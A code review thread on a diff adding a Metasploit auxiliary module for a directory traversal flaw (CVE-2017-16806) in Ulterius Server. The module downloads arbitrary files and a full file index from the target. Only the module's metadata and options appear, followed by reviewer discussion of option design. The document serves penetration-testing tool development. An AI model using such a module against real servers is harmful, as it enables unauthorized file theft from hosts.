modules/auxiliary/admin/http/ulterius_file_download.rb

```diff
@@ -0,0 +1,88 @@
+require 'zlib'
+require 'stringio'
+
+class MetasploitModule < Msf::Auxiliary
+  #Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Ulterius Server File Download Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in Ulterius Server < v1.9.5.0
+        to download files from the affected host. A valid file path is needed to download a file.
+        Fortunately, Ulterius indexes every file on the system, which can be stored in the
+        following location:
+
+          http://ulteriusURL:port/.../fileIndex.db.
+
+        This module can download and parse the fileIndex.db file. There is also an option to
+        download a file using a provided path.
+      },
+      'Author'         =>
+        [
+          'Rick Osgood',   # Vulnerability discovery and PoC
+          'Jacob Robles'   # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '43141' ],
+          [ 'CVE', '2017-16806' ]
+        ]))
+
+      register_options(
+        [
+          Opt::RPORT(22006),
+          OptString.new('TARGETURI', [true, 'The path of the web application', '/']),
+          OptBool.new('INDEX', [false, 'Attempt to retrieve and parse fileIndex.db', false])
```

Comment:
this part also feels a bit weird.  There is a 2 condition, you have to tell it the fileindex.db file in targeturi, but also boolean this to true.

My guess is fileIndex.db's name is fairly unique, so I'd drop this option and if the targeturi ends with fileindex.db, attempt to parser it out.

Reply:
Perhaps it would be a good idea to implement these functions as module actions?

One to download the index, one to download arbitrary files.

Reply:
I thought the two options were weird as well. I'm updating the code to check for the `fileIndex.db` name. 
Side note: I don't really like how you have to run info to see available target/actions.